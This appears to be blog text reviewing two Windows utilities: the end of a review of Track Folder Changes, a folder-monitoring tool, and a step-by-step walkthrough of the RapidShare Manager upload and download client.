As useful as it is, Track Folder Changes is not a hardcore tool that is able to work on all situations. I tried uninstalling iTunes and monitor the whole C:\ drive with Track Folder Changes. When iTunes has finished uninstalled, Track Folder Changes stopped responding and Windows Task Manager shows that the process is taking up 100% CPU usage. After waiting a couple of minutes, Track Folder Changes displays the changes and starts to work normally again.

My only gripe is it lacks of a pause button or an option to export it to a log file so that it is easier to analyze the folder changes. If you have a process that is constantly making changes on the files and folders on your Windows computer, there is no way you can track or analyze the changes on files/folders.

Download Track Folder Changes

Previously I’ve shared with you on how to download multiple files from RapidShare automatically using Orbit download manager. If you don’t like to use Orbit, you can use a small DOS tool called gRapid to automate downloading of files without having to attend to them. Both methods requires you to have a premium account. If you don’t have a premium account, you can use third party tools such as Cryptload or (E)lephant to renew your IP address and continue downloading without limits.

Today I will share with you an official tool released by RapidShare.com. Finally RapidShare has their own free download manager to handle all downloads and uploads from RapidShare. This is of course if you have a premium account, you can make full use of the program. If you are a free user or have a collectors account, you can still use RapidShare Manager to upload your files to RapidShare.


The RapidShare Manager (RSM) is a user friendly tool to upload and download files from RapidShare.com. The multiple setting possibility’s allow the professional up- and downloading for beginners and experienced users. Upload is possible for premium, collector’s and free user. As for download, I’m sorry to say that it is only for Premium users UNLESS the file is set to direct-download.

I will show you a short walkthrough on how to use RapidShare Manager to download multiple rapidshare links.

1. Run RapidShare Manager and go to Account/Configuration tab.

2. Click Add button at the login area and enter your login for premium account and password. Check use this account and click OK.

3. Go to Download tab, and click Add button. Paste the rapidshare links at the top box and click Take Links button. You can also set the location where the downloaded files be saved to.

4. Click Download button. You can set the maximum number of parallel downloads running. Maximum is 5. If you’re able to maxed out your download speed, then I’d advice you to set it to 1.

RapidShare Manager requires you to have Microsoft .NET Framework installed. I found a small bug in the program which is you can’t add more than 1 rapidshare premium account. They should also add a feature to auto shutdown computer after finish downloading. From what I see, it’s still a very new download manager for rapidshare that works, but can be improved.

One thing I’m unsure of is the upload limit for premium user. At RapidShare’s website, it stated that premium users can upload files with a file size up to 4000MB but at the program it says up to 2000MB. No matter whether it’s 4000MB or 2000MB, files bigger than 100 MB can only be downloaded by Premium users, unless the files have been a direct download and the traffic is paid by the file holder. I’m pretty sure not many people would actually upload file size that big when you can easily split it.

[ Download RapidShare Manager (RSM) ]